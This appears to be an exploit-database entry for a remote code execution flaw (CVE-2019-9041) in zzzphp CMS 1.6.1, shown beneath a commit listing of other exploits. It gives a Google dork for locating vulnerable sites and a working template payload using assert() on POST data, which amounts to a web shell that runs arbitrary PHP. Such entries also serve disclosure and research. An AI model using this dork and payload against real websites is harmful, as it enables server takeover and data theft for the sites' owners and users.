bb86158c6e
7 changes to exploits/shellcodes Xlight FTP Server 3.9.1 - Buffer Overflow (PoC) Jenkins - Remote Code Execution Jenkins Plugin Script Security < 1.50/Declarative < 1.3.4.1/Groovy < 2.61.1 - Remote Code Execution (PoC) Jenkins Plugin Script Security 1.49/Declarative 1.3.4/Groovy 2.60 - Remote Code Execution zzzphp CMS 1.6.1 - Remote Code Execution PHP Ecommerce Script 2.0.6 - Cross-Site Scripting / SQL Injection News Website Script 2.0.5 - SQL Injection Advance Gift Shop Pro Script 2.0.3 - SQL Injection Drupal < 8.6.9 - REST Module Remote Code Execution
30 lines
No EOL
1 KiB
Text
30 lines
No EOL
1 KiB
Text
# Exploit Title: dynamic code evaluation of zzzphp cms 1.6.1
|
|
|
|
# Google Dork: intext:"2015-2019 zzcms.com"
|
|
|
|
# Date: 24/02/2019
|
|
|
|
# Exploit Author: Yang Chenglong
|
|
|
|
# Vendor Homepage: http://www.zzzcms.com/index.html
|
|
|
|
# Software Link: http://115.29.55.18/zzzphp.zip
|
|
|
|
# Version: 1.6.1
|
|
|
|
# Tested on: windows/Linux,iis/apache
|
|
|
|
# CVE : CVE-2019-9041
|
|
|
|
Due to the failure of filtering function parserIfLabel() in inc/zzz_template.php, attackers can insert dynamic php code into the template file and leads to dynamic code evaluation.
|
|
|
|
Exploit:
|
|
login in to the admin panel, edit the template of search.html, insert the following code:
|
|
|
|
{if:assert($_POST[x])}phpinfo();{end if}
|
|
|
|
Visit the http://webroot/search/ and post data “x = phpinfo();”, the page will execute the php code “phpinfo()” as follow:
|
|
[1.png]
|
|
|
|
Remarks:
|
|
While the above exploit requires attackers to have the access to the admin panel, I will post another exploit by using csrf to acquire the control of website without access to the admin panel. |